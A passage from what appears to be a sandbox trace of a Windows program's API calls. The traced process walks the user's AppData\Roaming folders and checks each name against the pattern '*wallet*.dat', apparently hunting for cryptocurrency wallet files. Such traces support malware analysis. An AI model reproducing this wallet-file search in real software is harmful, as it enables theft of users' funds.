lpFindFileData=0x19bf38*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.477] FindNextFileA (in: hFindFile=0x5e7848, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="AppContainerUserCertRead", cAlternateFileName="APPCON~1")) returned 1 [0207.477] PathMatchSpecA (pszFile="AppContainerUserCertRead", pszSpec="*wallet*.dat") returned 0 [0207.477] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="A", cAlternateFileName="J")) returned 0xffffffff [0207.478] FindNextFileA (in: hFindFile=0x5e7848, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0207.478] PathMatchSpecA (pszFile="Certificates", pszSpec="*wallet*.dat") returned 0 [0207.478] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e48 [0207.478] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.478] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0207.478] FindClose (in: hFindFile=0x5e7e48 | out: hFindFile=0x5e7e48) returned 1 [0207.478] FindNextFileA (in: hFindFile=0x5e7848, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="CRLs", cAlternateFileName="")) returned 1 [0207.478] PathMatchSpecA (pszFile="CRLs", pszSpec="*wallet*.dat") returned 0 [0207.479] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e78c8 [0207.479] FindNextFileA (in: hFindFile=0x5e78c8, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.479] FindNextFileA (in: hFindFile=0x5e78c8, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0207.479] FindClose (in: hFindFile=0x5e78c8 | out: hFindFile=0x5e78c8) returned 1 [0207.479] FindNextFileA (in: hFindFile=0x5e7848, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="CTLs", cAlternateFileName="")) returned 1 [0207.479] PathMatchSpecA (pszFile="CTLs", pszSpec="*wallet*.dat") returned 0 [0207.480] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e48 [0207.480] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.480] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0207.480] FindClose (in: hFindFile=0x5e7e48 | out: hFindFile=0x5e7e48) returned 1 [0207.480] FindNextFileA (in: hFindFile=0x5e7848, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="CTLs", cAlternateFileName="")) returned 0 [0207.480] FindClose (in: hFindFile=0x5e7848 | out: hFindFile=0x5e7848) returned 1 [0207.480] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="My", cAlternateFileName="")) returned 0 [0207.480] FindClose (in: hFindFile=0x5e7e08 | out: hFindFile=0x5e7e08) returned 1 [0207.481] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0207.481] PathMatchSpecA (pszFile="Templates", pszSpec="*wallet*.dat") returned 0 [0207.481] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7b88 [0207.483] FindNextFileA (in: hFindFile=0x5e7b88, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.483] FindNextFileA (in: hFindFile=0x5e7b88, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="LiveContent", cAlternateFileName="LIVECO~1")) returned 1 [0207.483] PathMatchSpecA (pszFile="LiveContent", pszSpec="*wallet*.dat") returned 0 [0207.483] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e48 [0207.484] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.484] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="16", cAlternateFileName="")) returned 1 [0207.484] PathMatchSpecA (pszFile="16", pszSpec="*wallet*.dat") returned 0 [0207.484] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a48 [0207.485] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.485] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Managed", cAlternateFileName="")) returned 1 [0207.486] PathMatchSpecA (pszFile="Managed", pszSpec="*wallet*.dat") returned 0 [0207.486] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e08 [0207.529] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.529] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 1 [0207.529] PathMatchSpecA (pszFile="Document Themes", pszSpec="*wallet*.dat") returned 0 [0207.529] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e88 [0207.530] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.530] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="1033", cAlternateFileName="")) returned 1 [0207.530] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0207.530] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19a218, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x5e7708 [0207.532] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0207.534] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9826b304, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9826b304, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x70d51000, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x893c1, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03090430[[fn=Banded]].thmx", cAlternateFileName="TM0309~1.THM")) returned 1 [0207.534] PathMatchSpecA (pszFile="TM03090430[[fn=Banded]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.534] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9826b304, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9826b304, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x70d51000, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x893c1, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.534] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984f5d1e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984f5d1e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa299a700, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x192bb1, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03090434[[fn=Wood Type]].thmx", cAlternateFileName="TM0309~2.THM")) returned 1 [0207.535] PathMatchSpecA (pszFile="TM03090434[[fn=Wood Type]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.535] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984f5d1e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984f5d1e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa299a700, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x192bb1, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.535] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x988e757c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x988e757c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xbdc7df00, ftLastWriteTime.dwHighDateTime=0x1d43fda, nFileSizeHigh=0x0, nFileSizeLow=0x883d3, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03457444[[fn=Basis]].thmx", cAlternateFileName="TM2094~1.THM")) returned 1 [0207.535] PathMatchSpecA (pszFile="TM03457444[[fn=Basis]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.535] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x988e757c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x988e757c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xbdc7df00, ftLastWriteTime.dwHighDateTime=0x1d43fda, nFileSizeHigh=0x0, nFileSizeLow=0x883d3, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.535] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98acf19f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98acf19f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xe42a5200, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x8b615, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03457464[[fn=Dividend]].thmx", cAlternateFileName="TM5959~1.THM")) returned 1 [0207.535] PathMatchSpecA (pszFile="TM03457464[[fn=Dividend]].thmx", 